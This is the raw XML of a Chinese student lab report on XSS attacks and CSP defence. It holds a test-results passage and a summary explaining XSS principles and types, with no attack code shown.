      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>.example32</w:t>
        </w:r>
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>c</w:t>
        </w:r>
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中1、4、6</w:t>
      </w:r>
      <w:r w:rsidR="00DB09D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>都是成功了，是通过php方式设置CSP防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23679110" w14:textId="7D7F8DAF" w:rsidR="00DB09D0" w:rsidRDefault="00DB09D0" w:rsidP="00DB09D0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④ </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB09D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点击click</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB09D0">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB09D0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>me后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只有a网站执行成功，b、c网站均不执行，因此csp防御有效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B6478" w14:textId="2FFA06AB" w:rsidR="00B26651" w:rsidRDefault="00B26651" w:rsidP="00DB09D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25DE9501" w14:textId="67071AC2" w:rsidR="00B26651" w:rsidRDefault="00B26651" w:rsidP="00DB09D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169A64B0" w14:textId="77777777" w:rsidR="00B26651" w:rsidRPr="00DB09D0" w:rsidRDefault="00B26651" w:rsidP="00DB09D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C88D9CE" w14:textId="02E5F5D2" w:rsidR="00FF4F4B" w:rsidRDefault="00526233" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00526233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验总结：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F7FBE" w14:textId="149F785B" w:rsidR="002844EB" w:rsidRDefault="00E6061F" w:rsidP="008401C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在本次实验中，在实验中犯了几个小问题导致实验一直难以进行下去，在下一个实验中一定要好好改正。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D9023E" w14:textId="7B7B14BC" w:rsidR="00E6061F" w:rsidRDefault="00E6061F" w:rsidP="00E6061F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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从pdf文件中复制的代码的符号“有问题；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD765A3" w14:textId="436C44B3" w:rsidR="00E6061F" w:rsidRDefault="00E6061F" w:rsidP="00E6061F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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在编辑个人资料时，忘记应该用HTML模式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9469A2" w14:textId="455D1D8B" w:rsidR="00E6061F" w:rsidRDefault="00E6061F" w:rsidP="00E6061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经过实验，我也对本次xss攻击有了了解，总结如下；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2043492C" w14:textId="67DBBA98" w:rsidR="00E6061F" w:rsidRDefault="00E6061F" w:rsidP="00E6061F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6061F">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击原理是:用户提交的变量没有经过完整过滤Html字符或者根本就没有经过过滤就放到了数据库中，一个恶意用户提交的Html代码被其它浏览该网站的用户访问,通过这些Html代码也就间接控制了浏览者的浏览器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739257EB" w14:textId="79E2B701" w:rsidR="00E6061F" w:rsidRPr="00E6061F" w:rsidRDefault="00E6061F" w:rsidP="00E6061F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:firstLine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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>有两种类型：反射型和存储型。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E6061F" w:rsidRPr="00E60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A9728" w14:textId="77777777" w:rsidR="00E675A3" w:rsidRDefault="00E675A3" w:rsidP="005B170E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A963982" w14:textId="77777777" w:rsidR="00E675A3" w:rsidRDefault="00E675A3" w:rsidP="005B1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9F92B" w14:textId="77777777" w:rsidR="00E675A3" w:rsidRDefault="00E675A3" w:rsidP="005B170E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5A342375" w14:textId="77777777" w:rsidR="00E675A3" w:rsidRDefault="00E675A3" w:rsidP="005B1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FB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F36EDAA"/>
    <w:lvl w:ilvl="0" w:tplc="5CDE49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EF11D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9FCE34C"/>
    <w:lvl w:ilvl="0" w:tplc="CA52252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AB608F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACB634CE"/>
    <w:lvl w:ilvl="0" w:tplc="371214D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C01593"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99C4707A"/>
    <w:lvl w:ilvl="0" w:tplc="F2D68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EB2C58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A8295C8"/>
    <w:lvl w:ilvl="0" w:tplc="B8147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080C85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C6C72EA"/>
    <w:lvl w:ilvl="0" w:tplc="D4CA08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BE77C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2BCC8850"/>
    <w:lvl w:ilvl="0" w:tplc="935CA3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2E4C7C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDEEDF30"/>
    <w:lvl w:ilvl="0" w:tplc="BA5C02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552BD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7E49308"/>
    <w:lvl w:ilvl="0" w:tplc="7110D8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401F24"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="812A95FA"/>
    <w:lvl w:ilvl="0" w:tplc="580E7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3E566D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F544CA4A"/>
    <w:lvl w:ilvl="0" w:tplc="432435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F17272"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29B21CCC"/>
    <w:lvl w:ilvl="0" w:tplc="F33CD7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D2A49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97D8E090"/>
    <w:lvl w:ilvl="0" w:tplc="02D8746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5F40F9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="456EFB9A"/>
    <w:lvl w:ilvl="0" w:tplc="BCA460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C6539C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00669CCA"/>
    <w:lvl w:ilvl="0" w:tplc="74FEAE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60091C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B77C809C"/>
    <w:lvl w:ilvl="0" w:tplc="3B324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8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="5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07"/>
    <w:rsid w:val="000049E4"/>
    <w:rsid w:val="00021D08"/>
    <w:rsid w:val="00047220"/>
    <w:rsid w:val="00051393"/>
    <w:rsid w:val="000A09C5"/>
    <w:rsid w:val="000C6BDA"/>
    <w:rsid w:val="00103BAF"/>
    <w:rsid w:val="00106EEA"/>
    <w:rsid w:val="00112ACC"/>
    <w:rsid w:val="00182912"/>
    <w:rsid w:val="001912C5"/>
    <w:rsid w:val="001A5ED3"/>
    <w:rsid w:val="001C2184"/>
    <w:rsid w:val="00231E86"/>
    <w:rsid w:val="00275728"/>
    <w:rsid w:val="002844EB"/>
    <w:rsid w:val="002B0EFB"/>
    <w:rsid w:val="002C4FB5"/>
    <w:rsid w:val="002E6713"/>
    <w:rsid w:val="00321FDB"/>
    <w:rsid w:val="003577AF"/>
    <w:rsid w:val="003A1FC2"/>
    <w:rsid w:val="003C5A00"/>
    <w:rsid w:val="003D20A5"/>
    <w:rsid w:val="003F1209"/>
    <w:rsid w:val="0043251D"/>
    <w:rsid w:val="00483759"/>
    <w:rsid w:val="004F65AE"/>
    <w:rsid w:val="00503288"/>
    <w:rsid w:val="00526233"/>
    <w:rsid w:val="0055460E"/>
    <w:rsid w:val="005668ED"/>
    <w:rsid w:val="00593073"/>
    <w:rsid w:val="005B170E"/>
    <w:rsid w:val="005C0C4E"/>
    <w:rsid w:val="00694ED2"/>
    <w:rsid w:val="006D1D97"/>
    <w:rsid w:val="00720437"/>
    <w:rsid w:val="00755833"/>
    <w:rsid w:val="00757FD3"/>
    <w:rsid w:val="00761042"/>
    <w:rsid w:val="007E416E"/>
    <w:rsid w:val="007F06C2"/>
    <w:rsid w:val="007F24E2"/>
    <w:rsid w:val="007F79EC"/>
    <w:rsid w:val="008119E3"/>
    <w:rsid w:val="00816B07"/>
    <w:rsid w:val="008252AB"/>
    <w:rsid w:val="008401CA"/>
    <w:rsid w:val="0085771D"/>
    <w:rsid w:val="008926E8"/>
    <w:rsid w:val="00922A2F"/>
    <w:rsid w:val="00936AE0"/>
    <w:rsid w:val="0095592A"/>
    <w:rsid w:val="00961442"/>
    <w:rsid w:val="00993F7F"/>
    <w:rsid w:val="009A0F9D"/>
    <w:rsid w:val="009C3746"/>
    <w:rsid w:val="009C4072"/>
    <w:rsid w:val="009D37B4"/>
    <w:rsid w:val="009E6DCC"/>
    <w:rsid w:val="00A11983"/>
    <w:rsid w:val="00A12DD4"/>
    <w:rsid w:val="00A21F01"/>
    <w:rsid w:val="00A473EB"/>
    <w:rsid w:val="00A6059E"/>
    <w:rsid w:val="00A91E76"/>
    <w:rsid w:val="00AB1B4C"/>
    <w:rsid w:val="00AE120C"/>
    <w:rsid w:val="00B103CE"/>
    <w:rsid w:val="00B26651"/>
    <w:rsid w:val="00B5725C"/>
    <w:rsid w:val="00B63CA7"/>
    <w:rsid w:val="00B90FB5"/>
    <w:rsid w:val="00BA2260"/>
    <w:rsid w:val="00C50E6E"/>
    <w:rsid w:val="00C50EE2"/>
    <w:rsid w:val="00C761F5"/>
    <w:rsid w:val="00CD5A6D"/>
    <w:rsid w:val="00CE1484"/>
    <w:rsid w:val="00D47274"/>
    <w:rsid w:val="00D65F63"/>
    <w:rsid w:val="00D77C5B"/>
    <w:rsid w:val="00DB09D0"/>
    <w:rsid w:val="00DB2B2D"/>
    <w:rsid w:val="00DC073B"/>
    <w:rsid w:val="00E46E89"/>
    <w:rsid w:val="00E6061F"/>
    <w:rsid w:val="00E675A3"/>
    <w:rsid w:val="00E750F0"/>
    <w:rsid w:val="00E87969"/>
    <w:rsid w:val="00EA739A"/>
    <w:rsid w:val="00EC0DBE"/>
    <w:rsid w:val="00ED0C77"/>
    <w:rsid w:val="00F77D13"/>
    <w:rsid w:val="00FA5213"/>
    <w:rsid w:val="00FA64F9"/>
    <w:rsid w:val="00FB2F8C"/>
    <w:rsid w:val="00FC2921"/>
    <w:rsid w:val="00FD196E"/>
    <w:rsid w:val="00FE1C29"/>
    <w:rsid w:val="00FF030D"/>
    <w:rsid w:val="00FF0E94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91A13"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D67D3A56-D52E-416D-8D02-02B80A89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4E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F65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F65A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B1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B170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B1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B170E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7572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example32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example32b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example32a.com" TargetMode="External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12</Pages>
  <Words>531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ccc cc</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ccc cc</cp:lastModifiedBy>
  <cp:revision>57</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-20T08:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-01T08:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>